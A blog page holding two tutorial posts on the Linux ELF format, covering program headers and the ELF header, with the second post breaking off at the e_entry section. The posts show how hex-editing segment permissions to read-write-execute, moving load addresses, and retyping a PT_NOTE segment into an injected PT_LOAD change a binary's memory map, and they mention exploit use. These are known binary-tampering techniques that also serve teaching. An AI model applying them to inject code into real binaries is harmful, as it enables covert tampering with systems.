<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi77-zUnNikthYSz5XKLd8wMKSgi02_oiur4FS3dWVazIzNDNpDp-O8uD8ux1889MEcypq3er2rdns0EwN8yIKEYsaSqfqxeViWlBNqAFsCdwNuTAUQfJlCO0B7A67YSfOsgjlu1D5O51s/s1600/PT_INTERPT.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="683" data-original-width="686" height="636" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi77-zUnNikthYSz5XKLd8wMKSgi02_oiur4FS3dWVazIzNDNpDp-O8uD8ux1889MEcypq3er2rdns0EwN8yIKEYsaSqfqxeViWlBNqAFsCdwNuTAUQfJlCO0B7A67YSfOsgjlu1D5O51s/s640/PT_INTERPT.png" width="640" /></a></div>
<br />
<br />
There are a number of other program header types, I've only expanded on a couple of the most important ones for this post. Its best to check out the documentation if you want to grasp the full <span style="font-family: "courier new" , "courier" , monospace;">p_type</span> range of values.<br />
<br />
Other than this, the program header format has a few more attributes, these are important to understand if you're going to pull off the PT_LOAD wizardy later on in the post.</div>
</div>
<div>
<br /></div>
<div>
<ul style="text-align: left;">
<li><span style="font-family: "courier new" , "courier" , monospace;">p_offset</span> - the offset into the ELF file where this segments content is defined later on we will point this value to different places. </li>
<li><span style="font-family: "courier new" , "courier" , monospace;">p_vaddr</span> - the virtual address that this segment will be mapped to, should it be mapped into memory (again this only really applies to PT_LOAD type headers)</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">p_paddr</span> - the physical address the segment will be mapped to should the OS running this use a memory loader standard that wants straight up physical address targeting.</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">p_filesz</span> - this is the size of the segment in the file, basically tells the loader how many bytes to suck out of the ELF.</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">p_memsz</span> - this is the size of the segment in memory, some portions of the process image may want of course a different in memory size to be able to host expansion or dynamic usage perhaps.</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">p_flags</span> - the permissions under which this field will be mapped (should it be mapped into memory)</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">p_align</span> - This field is to make sure the segments when mapped in are aligned to memory properly. For a proper explanation please see the documentation.<i> </i></li>
</ul>
</div>
<div>
So just to recap, each program header has these <span style="font-family: "courier new" , "courier" , monospace;">p_*</span> fields but whether the <span style="font-family: "courier new" , "courier" , monospace;">p_type</span> is <span style="font-family: "courier new" , "courier" , monospace;">PT_LOAD</span> or not decides whether the <i>content described by</i> the program header will actually end up as part of the memory image. The emphasis in the above sentence is because sometimes (<i>due to the chunk based loading style of the kernel</i>) the entire header table can end up in memory.<br />
<br />
Anyway moving on, we should for interests sake fiddle with some <span style="font-family: "courier new" , "courier" , monospace;">p_type</span> values and see what happens.<br />
<br /></div>
<div>
If we throw some crazy bytes at the program header type field readelf spits out some interesting stuff:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiefG6FWfPsKcJGPDBDHEo-PfPQHFpKh9sPocwarZPhrpwqZD8zxfCIqnpHRRpR6C4ryLlHr8rjeZ6-bQlZVffiln37POK89TWYsoICUwEgXI2AeM9kUHndQzVxGJlvKHfzQj8wcCIkr50/s1600/Screenshot+from+2018-09-12+23-48-28.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="186" data-original-width="1400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiefG6FWfPsKcJGPDBDHEo-PfPQHFpKh9sPocwarZPhrpwqZD8zxfCIqnpHRRpR6C4ryLlHr8rjeZ6-bQlZVffiln37POK89TWYsoICUwEgXI2AeM9kUHndQzVxGJlvKHfzQj8wcCIkr50/s1600/Screenshot+from+2018-09-12+23-48-28.png" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhq4xdzcmoHTZFkMC5ph6wX8xKU6WhRu-FPmNhGL7BPu4IPTSXLBTu2Riw_j9ysggTie9sucQUPNndUo8UgSsVBRS8XPQxHWE7PIIUddqBPutY6VxU92EkpJWNZhSmqL_V1yNlRgkT0m-8/s1600/Screenshot+from+2018-09-12+23-48-11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="258" data-original-width="1395" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhq4xdzcmoHTZFkMC5ph6wX8xKU6WhRu-FPmNhGL7BPu4IPTSXLBTu2Riw_j9ysggTie9sucQUPNndUo8UgSsVBRS8XPQxHWE7PIIUddqBPutY6VxU92EkpJWNZhSmqL_V1yNlRgkT0m-8/s1600/Screenshot+from+2018-09-12+23-48-11.png" /></a></div>
<div>
<br /></div>
<div>
<br />
There are a couple more types to explore, some of which can sometimes be neat places to stuff things you need during an exploit. Either way its great to get to know the full set of behaviors the file is capable of - this way we can learn to describe more epic exploits with it!<br />
<br />
Okay so <span style="font-family: "courier new" , "courier" , monospace;">PT_LOAD</span> commands must be pretty interesting to mess around with so lets get that going next.<br />
<br />
<h2 style="text-align: left;">
PT_LOAD commands</h2>
<br />
<span style="font-family: "courier new" , "courier" , monospace;">PT_LOAD</span> commands as covered above, tell the loader where to stick what, with which permissions. Lets try something simple that will not immediately affect execution, but allow us to see the effect of our influence on the file. A good idea for this would be flipping some bits in the segment <span style="font-family: "courier new" , "courier" , monospace;">p_flags</span> field.<br />
They are pretty easy to spot in raw hex, here's me flipping the permissions on a <span style="font-family: "courier new" , "courier" , monospace;">PT_LOAD</span> segment to full exec, read and write these permissions are defined according to popular linux standards 0x01 exec, 0x4 for read, etc (<i>please see documentation for the full spec</i>) we are going to give it the value <span style="font-family: "courier new" , "courier" , monospace;">0x07</span>:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfEQ4nh2XQuVhi4AjvmU2vSzt2xadl5KVrMabQoA0Vm-yPTdq9cXJMTE0ufrIgm3RP4bLl9wQzK4kbiQGB2AqWj2iAlwZ3lFyVWy876nTRASlfcUuaGPbgIqC5gxIbsqvBX7oG4CaZn7k/s1600/PT_INTERP2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="368" data-original-width="918" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfEQ4nh2XQuVhi4AjvmU2vSzt2xadl5KVrMabQoA0Vm-yPTdq9cXJMTE0ufrIgm3RP4bLl9wQzK4kbiQGB2AqWj2iAlwZ3lFyVWy876nTRASlfcUuaGPbgIqC5gxIbsqvBX7oG4CaZn7k/s1600/PT_INTERP2.png" /></a></div>
<br />
If we're going to understand how things end up in memory from the interpretation of the ELF file we need to confirm our projections by looking at actual memory.<br />
<br />
This is a pretty easy thing to do in linux the <span style="font-family: "courier new" , "courier" , monospace;">/proc/[PID]/maps</span> device spits out the current memory map (<i>which will show you a good summary of where things are, what permissions they have etc etc</i>), in addition we can fiddle with some <span style="font-family: "courier new" , "courier" , monospace;">PT_LOAD</span> commands and then scratch in the processes memory using gdb. Here's the general methodology to testing <span style="font-family: "courier new" , "courier" , monospace;">PT_LOAD</span> options and confirm them:<br />
<br />
<ol style="text-align: left;">
<li>Mangle the headers as above</li>
<li>Open the file in gdb using `<span style="font-family: "courier new" , "courier" , monospace;">gdb ./compile_me.elf</span>`</li>
<li>Set a break point for <span style="font-family: "courier new" , "courier" , monospace;">_start</span> , it should still execute _start since all this involves is pointing the <span style="font-family: "courier new" , "courier" , monospace;">rip</span> there once the program is loaded and uhm well, letting it RIP!</li>
<li>Once the break point triggers we ask gdb what the process id is</li>
<li>using the process id from Step 4 we can look up the memory map using the<span style="font-family: "courier new" , "courier" , monospace;"> /proc/PID/maps</span> device</li>
</ol>
<div>
The following screenshot shows how this is done:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyWuYug67L92OfyD4BtfsTI4KPCp7KclWC8yIHfFDDxhmG2pkRpIKtrilfVi2TTKQtHqeP4DAv9puhNlqpxdynvkQn1Z2_EK5m607A10zdQHq5eCpFXqvH7LXKxSUSxqZ5PVL7xaywPGQ/s1600/changing+memory+permissions.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="429" data-original-width="903" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyWuYug67L92OfyD4BtfsTI4KPCp7KclWC8yIHfFDDxhmG2pkRpIKtrilfVi2TTKQtHqeP4DAv9puhNlqpxdynvkQn1Z2_EK5m607A10zdQHq5eCpFXqvH7LXKxSUSxqZ5PVL7xaywPGQ/s1600/changing+memory+permissions.png" /></a></div>
<div>
<br /></div>
<br />
And there you have it the memory is actually mapped with this crazy full perm setting!<br />
<br /></div>
<div>
<h2 style="text-align: left;">
Redirecting PT_LOADs</h2>
<br />
Okay so we can definitely change permissions but can we say change the address of a section in the actual memory image? Sure! Here's me doing that:<br />
<br />
<ol style="text-align: left;">
<li>hexedit the the <span style="font-family: "courier new" , "courier" , monospace;">p_vaddr</span> of the first <span style="font-family: "courier new" , "courier" , monospace;">PT_LOAD</span> segment in the ELF file</li>
<li>open the binary in gdb</li>
<li>break point on <span style="font-family: "courier new" , "courier" , monospace;">_start</span></li>
<li>pop open the memory map</li>
</ol>
<div>
You should be able to see something like this:</div>
<div>
<br /></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirAZ66B2zibyAjJgxxPEnQuKQo4quSrlYXPVL4tTwa3EzI9ZXsv02vpzPax3xjCcVdrb6KvrHdDc9CE5fkyTn-VrG0p1gfzmEL6Vrpi_hcZGdQGH5khyrPCPt8SAV5xkBmLUYa3TAtINM/s1600/PT_LOAD+8000.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="338" data-original-width="877" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirAZ66B2zibyAjJgxxPEnQuKQo4quSrlYXPVL4tTwa3EzI9ZXsv02vpzPax3xjCcVdrb6KvrHdDc9CE5fkyTn-VrG0p1gfzmEL6Vrpi_hcZGdQGH5khyrPCPt8SAV5xkBmLUYa3TAtINM/s1600/PT_LOAD+8000.png" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Of course this doesn't really execute it kind of dies just after <span style="font-family: "courier new" , "courier" , monospace;">_start</span> gets executed:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBNiwZpFDut8xJOWTY6n31FeUF0_mA9ea2vkC-d-7J1KLQTBa7wZo1atXZ_LMjVurCQkjRsfeVArEpBU9uZe8B7zACDDiMCl9-ZeDN5i5rgJrGYncZPPT-SmkGHqQI6rqcG2A7KQ4wfY4/s1600/Screenshot+from+2018-09-13+23-30-47.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="737" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBNiwZpFDut8xJOWTY6n31FeUF0_mA9ea2vkC-d-7J1KLQTBa7wZo1atXZ_LMjVurCQkjRsfeVArEpBU9uZe8B7zACDDiMCl9-ZeDN5i5rgJrGYncZPPT-SmkGHqQI6rqcG2A7KQ4wfY4/s1600/Screenshot+from+2018-09-13+23-30-47.png" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
We can also inject an extra <span style="font-family: "courier new" , "courier" , monospace;">PT_LOAD</span> command. To inject another load command an easy way is to just rewrite the type of another section. Try using the <span style="font-family: "courier new" , "courier" , monospace;">PT_NOTE</span> segment, they are pretty much ignored for our purposes. So here's me retyping the <span style="font-family: "courier new" , "courier" , monospace;">PT_NOTE</span> to be an injected <span style="font-family: "courier new" , "courier" , monospace;">PT_LOAD</span>:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_gWlCwJ0I4OhbDIR9lqSkG2Dn-yVv2o5AMws-AcD7nn_UWYxhnAQTX-kAz6741XrlXTCkvExJniIdmIpX6ReyAhJk7dlYN24Extdb154jgk-1mtpCubIQD4NmTml7z_FwAeliRpUWSL8/s1600/Screenshot+from+2018-09-13+23-41-34.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="605" data-original-width="1410" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_gWlCwJ0I4OhbDIR9lqSkG2Dn-yVv2o5AMws-AcD7nn_UWYxhnAQTX-kAz6741XrlXTCkvExJniIdmIpX6ReyAhJk7dlYN24Extdb154jgk-1mtpCubIQD4NmTml7z_FwAeliRpUWSL8/s1600/Screenshot+from+2018-09-13+23-41-34.png" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
This runs perfectly! Here's me confirming this in gdb, I've also included the live memory map:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHxk8ni07z0dQIKwPES6ZzZQ8nfoVQvVNUkwYnGKeLfHDQjk0BfGftc8D3f4Uu4MpTqW_ubx_JwNHPRrPyD16vmdyseV_M1Mm3QslHuGujrqc-wqz02bbqz6gMyTVZZtvDnsSVpz8h7mY/s1600/Screenshot+from+2018-09-13+23-45-24.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="652" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHxk8ni07z0dQIKwPES6ZzZQ8nfoVQvVNUkwYnGKeLfHDQjk0BfGftc8D3f4Uu4MpTqW_ubx_JwNHPRrPyD16vmdyseV_M1Mm3QslHuGujrqc-wqz02bbqz6gMyTVZZtvDnsSVpz8h7mY/s1600/Screenshot+from+2018-09-13+23-45-24.png" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
And that's it for this one! I'm sure you folks can figure out more interesting games to play with the program headers in the next post I'm going to start covering the Section headers. Stay Tuned!</div>
<div>
<br /></div>
<br />
References and Reading:<br />
<br />
<ul style="text-align: left;">
<li><a href="https://en.wikipedia.org/wiki/Executable_and_Linkable_Format">https://en.wikipedia.org/wiki/Executable_and_Linkable_Format </a></li>
</ul>
</div>
</div>
Keith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.com0tag:blogger.com,1999:blog-5845671313867906274.post-45100149095218650242018-09-12T23:01:00.000-07:002018-09-12T23:17:29.939-07:00Introduction to the ELF Format : The ELF Header (Part I)<div dir="ltr" style="text-align: left;" trbidi="on">
ELF Files are charged with using their magic to perform two holy tasks in the linux universe. The first being to tell the kernel where to place stuff in memory from the ELF file on disk as well as providing ways to invoke the dynamic loaders functions and maybe even help out with some debugging information. Essentially speaking its telling the kernel where to put it in memory and also the plethora of tools that interpret the file where all the data structures are that hold useful information for making sense of the file. Anyway that's as far as I've figured it out - the actual break down is a little less simple.<br />
<br />
<br />
I'll demonstrate why this is so here and over the next series of posts in the classic "Learn things by breaking them" style.<br />
<h2 style="text-align: left;">
ELF Header and Identification fields</h2>
The first thing that appears in an ELF file is of course the header, which is like most things in file formats just a list of offsets in the file. Its purpose is to indicate essentially what kind of ELF this is and where the various interpreters of the file can find the good stuff.<br />
<br />
Here's what the header looks like (I've included a sample here, you can grab any ELF file on the system):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUBNWD1SC4eEnayIGrzDjpw0zPI5wMPvCMRNuN1TzMKwzQDUnhzU4GbPnfCCnaOU_hphTxh7U_Uya1m2P-EXhYHTXf4BJYTgExo4kfUbFB7w_jH8CzR36xehMoNMW3Y16nHNjI31IOcFw/s1600/Screenshot+from+2018-09-12+00-43-40.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="584" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUBNWD1SC4eEnayIGrzDjpw0zPI5wMPvCMRNuN1TzMKwzQDUnhzU4GbPnfCCnaOU_hphTxh7U_Uya1m2P-EXhYHTXf4BJYTgExo4kfUbFB7w_jH8CzR36xehMoNMW3Y16nHNjI31IOcFw/s1600/Screenshot+from+2018-09-12+00-43-40.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
If you're not super used to the linuxy world, please don't pay strong attention to the .elf extension to my file normally ELF files do not have extensions to their file names.<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyxvjXP5fmdb5hTr8TlLvDX2bkpBXpVC7rdhOWyAneRNy3pvKgAMQQkPeTEQsrMz7GJvx5QXxF-vjGKyzaYue-t2kcjjseFZXB9XnW6hq8MZ_hYlh_izw8EKJdzK-pRgBxUlQ-gvWNT7E/s1600/Screenshot+from+2018-09-12+00-43-51.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="730" data-original-width="648" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyxvjXP5fmdb5hTr8TlLvDX2bkpBXpVC7rdhOWyAneRNy3pvKgAMQQkPeTEQsrMz7GJvx5QXxF-vjGKyzaYue-t2kcjjseFZXB9XnW6hq8MZ_hYlh_izw8EKJdzK-pRgBxUlQ-gvWNT7E/s400/Screenshot+from+2018-09-12+00-43-51.png" width="355" /></a></div>
<br />
<br />
The first field is called the ELF Identification. The ELF format is pretty flexible in that this same format can run on a ton of different architectures, with support for multiple encoding and Application Binary Interfaces. Here's the break down on how the <span style="font-family: "courier new" , "courier" , monospace;">EI_IDENT</span> field works :<br />
<br />
<ul style="text-align: left;">
<li>Offset <span style="font-family: "courier new" , "courier" , monospace;">0x00 - 0x03</span> <span style="font-family: "courier new" , "courier" , monospace;">EI_MAG0 ... EL_MAG3 </span>First for bytes of every ELF file are the ascii codes for<span style="font-family: "courier new" , "courier" , monospace;"> 'E' 'L' 'F'</span>.</li>
<li>Offset <span style="font-family: "courier new" , "courier" , monospace;">0x04 EI_CLASS</span> basically tells us whether the file is 32 or 64 bit. Standard says <span style="font-family: "courier new" , "courier" , monospace;">0x1</span> means 32 bit and <span style="font-family: "courier new" , "courier" , monospace;">0x2</span> means 64 bit. </li>
<li>Offset <span style="font-family: "courier new" , "courier" , monospace;">0x05 EI_DATA</span> defines the endianness of the file 0x01 means little endian and <span style="font-family: "courier new" , "courier" , monospace;">0x02</span> means big endian.</li>
<li>Offset <span style="font-family: "courier new" , "courier" , monospace;">0x06 EI_VERSION</span> shows the version of the ELF file, most should be set to <span style="font-family: "courier new" , "courier" , monospace;">0x1</span> for version 1.</li>
<li>Offset <span style="font-family: "courier new" , "courier" , monospace;">0x07 EI_OSABI </span>shows the OS Application Binary Interface (ABI) extensions to the ELF file being enabled. Please bare in mind the documentation is a bit flakey here and may depend heavily on the interpretation of the particular OSABI involved sometimes. </li>
</ul>
<br />
One can see what the <span style="font-family: "courier new" , "courier" , monospace;">EI_IDENT</span> field says by looking at the output of <span style="font-family: "courier new" , "courier" , monospace;">readelf -h</span>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwW__3wz49B8yuZzpL5Bj3c2FfHc04PArHtGOScQISk8Gww59VjTzQ87jAJ6NbygiYQfOOkugO3Eh-zNOBHm7jnpaiUOMvdZigks1lLpesVRmpF7ntZLkDaYPow7o1TLAAncP5JZSdyu4/s1600/Screenshot+from+2018-09-12+19-37-29.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="413" data-original-width="1352" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwW__3wz49B8yuZzpL5Bj3c2FfHc04PArHtGOScQISk8Gww59VjTzQ87jAJ6NbygiYQfOOkugO3Eh-zNOBHm7jnpaiUOMvdZigks1lLpesVRmpF7ntZLkDaYPow7o1TLAAncP5JZSdyu4/s1600/Screenshot+from+2018-09-12+19-37-29.png" /></a></div>
<br />
Pretty interesting stuff!<br />
<br />
Lets see what happens when we change the value of the ELF version number, pop open <span style="font-family: "courier new" , "courier" , monospace;">hexedit</span> and change offset <span style="font-family: "courier new" , "courier" , monospace;">0x06</span> in the file to whatever you want, then run <span style="font-family: "courier new" , "courier" , monospace;">readelf -h</span> on it. Here's what happens when I do this:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiX3JZEN-wgBRbeCNYJkEbafL9ZuNM9f_LcTZgXRBJDolCVck5GL6TTfjwOQ3nXAxS7J-UrNPJrySIPujJbLpMN_Grwo4DcuF_d2FBsCUcf0FLx2AJ-SOlki6LkN68Fc66mw4hjkRM9OsU/s1600/Screenshot+from+2018-09-12+19-56-19.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="113" data-original-width="935" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiX3JZEN-wgBRbeCNYJkEbafL9ZuNM9f_LcTZgXRBJDolCVck5GL6TTfjwOQ3nXAxS7J-UrNPJrySIPujJbLpMN_Grwo4DcuF_d2FBsCUcf0FLx2AJ-SOlki6LkN68Fc66mw4hjkRM9OsU/s1600/Screenshot+from+2018-09-12+19-56-19.png" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7BYS1ny7E_FxcUetuJ3neRyJYL5P7ckY8IBvYp4bnPexOrFYTnfFg9yT5MU-90XKxIHys4IEA0xlFqEruuPicwT3TMyn2cBa6y6z1cW_ncwxAR6eQdlGH4kA2npKqF9C9ToxLYJcpP9k/s1600/Screenshot+from+2018-09-12+19-56-44.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="234" data-original-width="1230" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7BYS1ny7E_FxcUetuJ3neRyJYL5P7ckY8IBvYp4bnPexOrFYTnfFg9yT5MU-90XKxIHys4IEA0xlFqEruuPicwT3TMyn2cBa6y6z1cW_ncwxAR6eQdlGH4kA2npKqF9C9ToxLYJcpP9k/s1600/Screenshot+from+2018-09-12+19-56-44.png" /></a></div>
<br />
<br />
<h2 style="text-align: left;">
ELF Type, Machine and Version Fields</h2>
<br />
The next file after the <span style="font-family: "courier new" , "courier" , monospace;">e_ident</span> file is the <span style="font-family: "courier new" , "courier" , monospace;">e_type</span>. In the example above I claim that the type is one of <span style="font-family: "courier new" , "courier" , monospace;">EXEC</span> (since it reads <span style="font-family: "courier new" , "courier" , monospace;">0x02 0x00</span>) - which according to the ELF standard means its meant to be executed (<i>checking the standard will confirm this</i>).<br />
<br />
Lets dump the header of what it is probably a shared object and compare the parameters for the <span style="font-family: "courier new" , "courier" , monospace;">e_type</span> field for instance. Here's the header for libvlc:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicavZpg08-PcBmSWNQPq6H-X3S_k1EjdgY_-5DVBvsawc8tByLnBbSFlKp_-PA2bWuX31dGjXAh0-AP1xrsSFpPQnwpaWgBSHbQ5ZkD7VjoXt4Q-HPDhSlpXt0_6jv65vrfr84K7CA-AI/s1600/Screenshot+from+2018-09-12+00-47-36.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="240" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicavZpg08-PcBmSWNQPq6H-X3S_k1EjdgY_-5DVBvsawc8tByLnBbSFlKp_-PA2bWuX31dGjXAh0-AP1xrsSFpPQnwpaWgBSHbQ5ZkD7VjoXt4Q-HPDhSlpXt0_6jv65vrfr84K7CA-AI/s1600/Screenshot+from+2018-09-12+00-47-36.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<br />
Yup looks like the byte offsets agree!<br />
<br />
This one has the field for <span style="font-family: "courier new" , "courier" , monospace;">e_type</span> set to the bytes<span style="font-family: "courier new" , "courier" , monospace;"> 0x03 0x00</span> at offset <span style="font-family: "courier new" , "courier" , monospace;">0x10</span> in the file header - this means its an ELF type of <span style="font-family: "courier new" , "courier" , monospace;">DYN</span> which means its definitely a shared object. And here's read elf confirming this information:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1hY6PEYIK1b1zjtibkPcQz9ws6TmlSHbbTpj6ki7yAUSqK-5XHPvRmmmAu28wf_iIubNDdQcQce_pbQHCnhMjGTn4y8RHElM_l9nsFpIJv6QVAQa_D1BH8RpPxMiKU-RS_lIyn0ezUwk/s1600/Screenshot+from+2018-09-12+00-52-12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="408" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1hY6PEYIK1b1zjtibkPcQz9ws6TmlSHbbTpj6ki7yAUSqK-5XHPvRmmmAu28wf_iIubNDdQcQce_pbQHCnhMjGTn4y8RHElM_l9nsFpIJv6QVAQa_D1BH8RpPxMiKU-RS_lIyn0ezUwk/s1600/Screenshot+from+2018-09-12+00-52-12.png" /></a></div>
<br />
<br />
After the type field we find the <span style="font-family: "courier new" , "courier" , monospace;">e_machine</span> specification for the file which can have a number of settings each indicating the architecture this file is meant for. Again ELF supports a number of architectures so there's a range of values this can take. Might be a good idea to fiddle with this field and see what happens.<br />
Here's some examples I found that don't appear in normal documentation:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWBSZIwGMfu3xtlcoXyZuYR89gjf_NEMtoAW_cjQ9AevgjAjms3AF967HHyyOIe-Pua2__qYcrd5hmZBJLNcS5y5bC8OnMUBZyl3iVfzB7TUWjL2CPimnyp45XJYdF0wNFP16b6kWAvaM/s1600/Screenshot+from+2018-09-12+20-09-39.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="134" data-original-width="1509" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWBSZIwGMfu3xtlcoXyZuYR89gjf_NEMtoAW_cjQ9AevgjAjms3AF967HHyyOIe-Pua2__qYcrd5hmZBJLNcS5y5bC8OnMUBZyl3iVfzB7TUWjL2CPimnyp45XJYdF0wNFP16b6kWAvaM/s1600/Screenshot+from+2018-09-12+20-09-39.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0l_lOwRS7_YRIGji5TBFjf1pCFfMUzWCkDgC1ns7o-J-PUQkyiXolBbckZsrU_cQyIAKHriHhUFc2i0Fx73nCeaxpWsniyS9OK9f-OfxDf45dtnZzEGQgH9ADVT-EBA1sxzTJ80HyirI/s1600/Screenshot+from+2018-09-12+20-09-10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="171" data-original-width="1204" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0l_lOwRS7_YRIGji5TBFjf1pCFfMUzWCkDgC1ns7o-J-PUQkyiXolBbckZsrU_cQyIAKHriHhUFc2i0Fx73nCeaxpWsniyS9OK9f-OfxDf45dtnZzEGQgH9ADVT-EBA1sxzTJ80HyirI/s1600/Screenshot+from+2018-09-12+20-09-10.png" /></a></div>
<br />
<br />
Always good to throw a couple bytes at the format and see what it really does! Moving on the next field is the <span style="font-family: "courier new" , "courier" , monospace;">e_version</span> which also indicates the ELF version number, which should as the byte field in the <span style="font-family: "courier new" , "courier" , monospace;">EI_IDENT</span> field. You can pretty much set this to anything and it should still run:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicIuXZCOmQhvjdUim2ddtCGNFK3TBuifgXrHKR3ACOG-YAjjkX0o3kVzEHSqiryNIPpeu113jLPJtBADrLeunnXYCuf-jrcPgP3pnEjL0zkuyea8EulqLsuJjfjnlg2jZT-CM7qfLk-UY/s1600/Screenshot+from+2018-09-12+20-15-27.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="194" data-original-width="1265" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicIuXZCOmQhvjdUim2ddtCGNFK3TBuifgXrHKR3ACOG-YAjjkX0o3kVzEHSqiryNIPpeu113jLPJtBADrLeunnXYCuf-jrcPgP3pnEjL0zkuyea8EulqLsuJjfjnlg2jZT-CM7qfLk-UY/s1600/Screenshot+from+2018-09-12+20-15-27.png" /></a></div>
<br />
<br />
The next field is one of the most important so I thought I would pop it in its own section and show you how to fiddle with it in a way that confirms its behavior.<br />
<h2 style="text-align: left;">
The e_entry field</h2>
